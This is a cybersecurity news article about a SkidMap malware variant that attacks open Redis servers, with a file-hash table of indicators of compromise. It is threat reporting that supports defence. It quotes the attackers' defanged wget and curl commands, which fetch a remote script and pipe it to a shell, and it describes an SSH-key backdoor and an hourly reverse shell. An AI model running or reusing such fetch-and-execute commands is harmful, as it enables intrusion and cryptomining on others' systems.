According to recent reports, there have been instances of threat actors using malware called “SkidMap” to exploit vulnerable Redis systems.
Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and create false network traffic and CPU usage by loading malicious kernel modules.
However, this malware’s recent version seems quite sophisticated and targets only open Redis instances.
.png
)
SkidMap Malware Attacking Linux
Further analysis of the new variant on SkidMap revealed activities like adaptation to the operating system where it gets executed and choosing the binary to download based on the Linux Distribution architecture on the infected system.
Initially, the threat actor attempts to login to open Redis instances for setting up cron tasks with a variable using base64 string. These strings consist of two cron tasks to run a “wget” (wget hxxp://z[.]shavsl[.]com/b -qO – | sh) and “curl” (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh)command that gets executed at a 10 minute interval for downloading the dropper scripts ‘b’, ‘c’ and ‘f’.
The dropper scripts are used to download an executable binary file (ELF) ‘gif’ (previous version used ‘jpeg’) to the ‘/var/lib/’ directory, which is the trojan file.
This trojan initially adds some SSH keys in the standard locations ‘/root/.ssh/authoried_keys’ and ‘/root/.ssh/authoried_keys2’. This is done to leave a backdoor for threat actors to login to the system.
Further actions include checking the status of SElinux (Security-Enhanced Linux) module, which is used to implement access control security policies and disable it permanently. After this, the trojan is made permanent by making specific modifications on the host OS.
The trojan creates a reverse shell to the C2 server of the attackers every hour through the TCP/8443 port. The gif binary is found to be targeting linux distributions like Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock.
A complete report has been published by Trustwave, which provides a complete explanation on the threat actors’ tactics, methods, source code, and other analysis.
Indicators of Compromise
| File Name | Hash Type | Hashes |
| b, c, f | MD5 | 000916c60b2ab828ba8cea914c308999 |
| SHA1 | 9970809e1dedce286888f7d25790b4dcca1e704b | |
| SHA256 | 969e10e4a61cc5f80c414259c4d90c74bcf43ccd5678910700bdc14cd60f9725 | |
| gif | MD5 | e23b3c7eb5d68e3cd43e9e61a3055fe8 |
| SHA1 | 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd | |
| SHA256 | f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 | |
| jpeg | MD5 | e23b3c7eb5d68e3cd43e9e61a3055fe8 |
| SHA1 | 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd | |
| SHA256 | f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 | |
| .miner | MD5 | 44de739950eb4a8a3552b4e1987e8ec2 |
| SHA1 | 0ae049aab363fb8d2e164150dffbafd332725e00 | |
| SHA256 | 9b81bad2111312e669697b69b9f121a1f9519da61cd5d37689e38381c1ffad28 |
Keep informed about the latest Cyber Security News by following us on GoogleNews, Linkedin, Twitter, and Facebook.
